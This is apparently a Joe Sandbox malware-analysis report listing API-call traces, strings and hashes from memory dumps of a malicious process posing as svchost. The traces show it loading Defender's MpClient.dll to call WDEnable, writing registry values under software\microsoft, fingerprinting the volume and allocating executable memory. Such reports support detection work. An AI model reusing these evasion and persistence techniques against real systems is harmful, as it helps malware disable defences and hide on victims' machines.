                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                              • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                              • API String ID: 1998047302-3691563785
                                                                                                                                                                                                              • Opcode ID: 9e6427e6ae90fb6ec752390d9cb9a505f08881173cff6222f59465548b7eca1a
                                                                                                                                                                                                              • Instruction ID: bfbb5fb19223cb0dab3582a8bb4c4f833d3158c144bbfb2222ca227caa49f799
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6427e6ae90fb6ec752390d9cb9a505f08881173cff6222f59465548b7eca1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E231E771D802097FEB20CBA4CC8CFFE7BB8BB44305F444698EA4666140DF749544CB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                              • API String ID: 1010965793-1794910726
                                                                                                                                                                                                              • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              • API String ID: 1140695583-228612681
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02665023
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02665032
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02665039
                                                                                                                                                                                                              • memset.MSVCRT ref: 02665051
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02665068
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0266506E
                                                                                                                                                                                                                • Part of subcall function 026541E0: GetProcessHeap.KERNEL32(00000008,02665097,00000000,76DC34D0,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 026541FE
                                                                                                                                                                                                                • Part of subcall function 026541E0: HeapAlloc.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654205
                                                                                                                                                                                                                • Part of subcall function 026541E0: memset.MSVCRT ref: 02654215
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 0266508F
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026650B6
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026650CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02665000
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                              • API String ID: 2345603349-374730529
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02652587
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,76F8F550,00000000), ref: 0265259E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,76F8F550,00000000), ref: 026525AB
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,?,76F8F550,00000000), ref: 026525E7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(02699F08,00000000,00000104,00000000,00000001,?,76F8F550,00000000), ref: 02652611
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,76F8F550,00000000), ref: 02652620
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,76F8F550,00000000), ref: 02652623
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,76F8F550,00000000), ref: 02652630
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,76F8F550,00000000), ref: 02652633
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 757758cda
                                                                                                                                                                                                              • API String ID: 780088666-941893065
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 02654EFF
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02654F02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02654F0F
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 02654F12
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02654F2A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02654F2D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02654F3A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02654F3D
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02654F53
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02654F5D
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02654F67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$CloseHandleInternet$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 278890334-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265478A
                                                                                                                                                                                                              • memset.MSVCRT ref: 026547C0
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 026547E7
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 0265480A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 0265487D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02654884
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654894
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 026548C2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1484339481-3673152959
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SymGetModuleBase.DBGHELP(00000000,?,?,00000004), ref: 02643969
                                                                                                                                                                                                              • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 0264397C
                                                                                                                                                                                                              • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02643993
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026439BD
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026439E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                              • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                              • API String ID: 844136142-2194319270
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265A068
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,0265A227), ref: 0265A09F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(0265A227,757759d9a,00000000,?,00000000,?), ref: 0265A0BC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(0265A227), ref: 0265A0C6
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 0265A0F9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,757759d9a,00000000,?,00000000,?), ref: 0265A116
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0265A120
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 757759d9a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-774380122
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026536B8
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 026536EF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,75775991a,00000000,?,00000000,?), ref: 0265370C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02653716
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02653749
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,75775991a,00000000,?,00000000,?), ref: 02653766
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02653770
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 75775991a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-2594810730
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02643428
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02655B76), ref: 0264345F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(02655B76,7577584ba,00000000,?,00000000,?), ref: 0264347C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02655B76), ref: 02643486
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 026434B9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,7577584ba,00000000,?,00000000,?), ref: 026434D6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 026434E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 7577584ba$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-923487616
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                                                              • API String ID: 0-1626504983
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00004070,76F90F00,00000000,76F92F00,?,02653CE8,?), ref: 02669793
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02653CE8,?), ref: 02669796
                                                                                                                                                                                                              • memset.MSVCRT ref: 026697AB
                                                                                                                                                                                                              • CreateFileA.KERNEL32(02653CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02653CE8,?), ref: 02669802
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02653CE8,?), ref: 02669825
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02653CE8,?), ref: 02669828
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02653CE8,?), ref: 02669834
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02653CE8,?), ref: 02669837
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,02653CE8,?), ref: 0266984A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02653CE8,?), ref: 0266984D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$CreateFileFreeValidatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 604365451-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654664
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,00000000,00000000), ref: 02654687
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,00000000,00000000), ref: 026546AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015,?,00000000,00000000), ref: 0265471D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02654724
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654734
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000002,?,00000000,00000000), ref: 02654762
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4043890984-3673152959
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265A147
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0265A159
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,0265A33F,?,0265A33F), ref: 0265A173
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(0265A33F,757759d9a,00000000,00000004,00000004,00000004,0265A33F), ref: 0265A190
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 0265A19A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0265A1A4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                              • String ID: 757759d9a$software\microsoft
                                                                                                                                                                                                              • API String ID: 287100044-774380122
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02665A7F
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02665AB8
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02665B23
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02665B86
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                              • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$75775945a$8A99A6EF
                                                                                                                                                                                                              • API String ID: 2823094833-3530877415
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02655B18
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02656C37,75775eaca,00000000,?,00000000,?), ref: 02655B5A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02656C37), ref: 02655B64
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(-80000001), ref: 02655B2A
                                                                                                                                                                                                                • Part of subcall function 02643420: IsUserAnAdmin.SHELL32 ref: 02643428
                                                                                                                                                                                                                • Part of subcall function 02643420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02655B76), ref: 0264345F
                                                                                                                                                                                                                • Part of subcall function 02643420: RegQueryValueExA.ADVAPI32(02655B76,7577584ba,00000000,?,00000000,?), ref: 0264347C
                                                                                                                                                                                                                • Part of subcall function 02643420: RegCloseKey.ADVAPI32(02655B76), ref: 02643486
                                                                                                                                                                                                                • Part of subcall function 02643420: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 026434B9
                                                                                                                                                                                                                • Part of subcall function 02643420: RegQueryValueExA.KERNEL32(?,7577584ba,00000000,?,00000000,?), ref: 026434D6
                                                                                                                                                                                                                • Part of subcall function 02643420: RegCloseKey.ADVAPI32(?), ref: 026434E0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 75775115a$75775eaca$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-987337165
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,76F8F550,00000000,753CBD50,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A578
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A5A0
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000040,026598DA,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A635
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,00000040,026598DA,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A64A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,026598DA,?,?,?,00000000,00000000,?,?,?,?,?,?,026598DA,00000000), ref: 0265A67A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,026598DA,?,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A686
                                                                                                                                                                                                                • Part of subcall function 0265A6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,0265A693,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A6BC
